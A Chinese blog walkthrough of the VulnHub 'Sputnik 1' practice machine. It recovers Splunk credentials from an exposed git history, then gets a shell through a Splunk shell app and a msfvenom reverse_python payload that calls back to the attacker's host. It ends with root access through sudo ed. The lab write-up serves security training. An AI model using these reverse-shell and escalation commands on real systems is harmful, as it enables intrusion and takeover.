vulnhub-Sputnik 1靶机

于 2024-10-07 17:04:39 发布
阅读量467 收藏 2
点赞数 14
文章标签: 安全性测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wjSteve/article/details/142743164
版权

vulnhub:https://www.vulnhub.com/entry/sputnik-1,301/

导入靶机,放在kali同网段,扫描

image-20240927164246670

靶机在192.168.114.135,扫描端口

image-20240927164617346

开了三个端口,访问

8089的功能基本都要账户访问

image-20240927164731993

55555端口是个小游戏

image-20240927164918495

之前nmap还找到了一个目录/.git,其中的logs目录下的一个文件让我们去克隆一个项目

https://github.com/ameerpornillos/flappy

image-20240927165036709

61337是个登录界面

image-20240927165153335

克隆项目

git clone https://github.com/ameerpornillos/flappy

查看日志

git log

一一查看日志,最后找到在07fda135aae22fa7869b3de9e450ff7cacfbc717

image-20240927165943355

git ls-tree 07fda135aae22fa7869b3de9e450ff7cacfbc717

image-20240927170057056

git show f4385198ce1cab56e0b2a1c55e8863040045b085

image-20240927170116914

是账户名和密码

sputnik:ameer_says_thank_you_and_good_job

之前有个登陆界面,尝试登陆,成功

image-20240927170207118

通过在网上查找,这个splunk有一个利用工具

https://github.com/TBGSecurity/splunk_shells

下载,然后上传到kali,在网站内安装

image-20240927170540488

image-20240927170553616

image-20240927170605194

image-20240927170629348

上传完成后重新启动

image-20240927170646217

再次登录会直接来到软件管理界面,设置软件权限

image-20240927170816952

image-20240927170835942

设置完成后来到网站的搜索框,输入反弹shell命令

| revshell std 192.168.114.128 6789

image-20240927170958340

kali开启监听,获取到shell

image-20240927171405146

想要执行sudo -l得先获取交互式shell,使用msfvenom生成payload

msfvenom -p cmd/unix/reverse_python lhost=192.168.114.128 lport=9876 R

image-20240927171925894

监听9876端口,在原有的shell运行payload,获取到新的shell后生成交互式shell

python -c 'import pty;pty.spawn("/bin/bash")'

image-20240927172723408

sudo -l显示我们可以使用ed,查找漏洞网站使用方式

image-20240927172804215

只需要在ed里输入!/bin/bash

image-20240927172858081

提权成功,flag在/root文件夹

生草工坊
关注
实验1:MapReduce课程实验
Abandon145的博客
04-18 1914
1.使用Tool工具类实现Mapreduce :WordCountTool方法 package mapreduce; import org.apache.hadoop.conf.Configuration; import org.apache.hadoop.conf.Configured; import org.apache.hadoop.fs.FSDataInputStream; import org.apache.hadoop.fs.FileStatus; import org.apache.ha
camera-sputnik
05-18
"camera-sputnik"是一个专为Android平台设计的应用程序,其主要功能是通过蓝牙与Arduino设备进行通信,以便从Arduino控制的相机捕获图像。这个应用的独特之处在于它结合了硬件控制(通过Arduino)和软件交互(通过...
vulnhub靶场-Sputnik
qq_42947816的博客
10-16 1650
Sputnik是一款易用级别的boot2root机器,旨在为安全爱好者提供学习和实践危害机器和渗透测试的挑战。
Vulnhub靶机】Sputnik 1
所有文章均免费阅读,大家一起学习
06-27 1282
有效载荷通过我们现有的 Netcat 会话上传,需要做的就是将有效载荷粘贴到终端并执行,在执行之前,需要再监听6666端口,也就是Msfvenom 创建一个python交互式shell。继续访问Logs目录并单击其中的HEAD文件:http://192.168.233.143:55555/.git/logs/HEAD。在最后一条发现部署上传成功!点击:Permissions,勾选:All apps,点击:Save保存,在网站检索ed命令,看看有没有提权的方式,选择sudo的形式,找到提权payload。
vulnhub】Sputnik打靶渗透
weixin_62162207的博客
08-05 341
Sputnik靶机:打靶训练
互联网编年史之-sputnik
weixin_34059951的博客
12-05 191
第一颗人造卫星的发射成功,直接导致了冷战时期美俄两国的太空竞赛  1957年苏联发射了人类第一颗人造卫星”Sputnik”。  在Sputnik进入太空之后的60年间,人造卫星在科学、军事和民生等各个方面都获得了极其广泛的应用,对人类通讯方式带来了颠覆性的影响,揭开并深化了冷战,催生了互联网, 进而彻底改变了人们认识自我、观看世界的方式。...
Sputnik 打靶渗透
m0_65112983的博客
08-08 1127
Sputnik 打靶渗透
Sputnik 开源项目教程
gitblog_00052的博客
08-27 710
Sputnik 开源项目教程 sputnikA library of GPU kernels for sparse matrix operations.项目地址:https://gitcode.com/gh_mirrors/spu/sputnik 项目介绍 Sputnik 是一个由 Google Research 开发的开源项目,旨在提供高效的稀疏矩阵运算库。稀疏矩阵在许多科学计算和机器学习任务...
Sputnik - 50th Anniversary
xddxz的专栏
10-03 131
Sputnik - 50th Anniversary
TouK/sputnik 开源项目教程
gitblog_01190的博客
08-30 739
TouK/sputnik 开源项目教程 sputnikStatic code review for your Gerrit patchsets. Runs Checkstyle, PMD, FindBugs, Scalastyle, CodeNarc, JSLint for you!项目地址:https://gitcode.com/gh_mirrors/sput/sputnik 项目介绍 To...
前端开源库-sputnik
08-29
在提供的压缩包文件“sputnik-master”中,通常包含以下内容: 1. **源代码**:项目的主体代码,包括核心模块和插件系统。 2. **文档**:详细的使用指南、API文档和示例,帮助开发者快速上手。 3. **配置文件**:...
java版ss源码-sputnik:人造卫星
06-04
Sputnik 是一个框架,它有助于遵循在 Hive 中处理数据的日常批处理作业的数据工程的良好实践。 它包含数据工程师编写和操作他们的工作所需的大部分代码。 这包括但不限于: 从此作业运行的控制台中指定的日期或日期...
sputnik-rp-content
03-06
【sputnik-rp-content】项目详解 `sputnik-rp-content`看起来是一个软件项目或者内容库的名称,但没有具体的标签信息,我们只能根据通用的IT知识来推测和解释这个项目的可能含义和相关知识点。从文件名`sputnik-rp-...
Sputnik-crx插件
03-18
Sputnik是使用免费的开源智能(OSINT)资源快速轻松地搜索IP,域,文件哈希和URL的扩展。用法•文本-选择要搜索的工件,然后单击鼠标右键•链接-右键单击链接,音频,图像,视频•选择OSINT工具•在大多数情况下,您...
飞翔的小鸟 scratch
最新发布
10-06
飞翔的小鸟 scratch
ANALOG DESIGN ESSENTIALS
10-06
ANALOG DESIGN ESSENTIALS
企事业单位知识竞赛答题小程序v2023.10
10-06
企事业单位知识竞赛答题小程序,在信息技术迅猛发展的时代,企业和事业单位在提升员工素质和知识水平方面面临着新的挑战。为了增强员工的学习积极性、提高团队凝聚力和整体素质,越来越多的单位开始组织知识竞赛活动。传统的知识竞赛往往依赖于线下纸质问卷,不仅耗时耗力,还难以及时统计结果。因此知识竞赛答题小程序,能够通过数字化手段提升竞赛的效率和互动性
qml opengl
08-10
QML中可以通过使用QML的ShaderEffect和ShaderEffectSource元素来调用OpenGL的能力实现各种渲染效果。这些效果是通过OpenGL的渲染语言来实现的,需要在程序执行时将相应的着色器程序发送到GPU上进行编译和运行。QML的着色器程序允许与OpenGL进行实时交互,并可以动态修改。123 #### 引用[.reference_title] - *1* *3* [如何在qml中使用opengl接口进行渲染](https://blog.csdn.net/Sputnik_02/article/details/124388519)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item] - *2* [QML进阶(七)-OpenGL渲染着色器效果实现](https://blog.csdn.net/yang1fei2/article/details/124568151)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值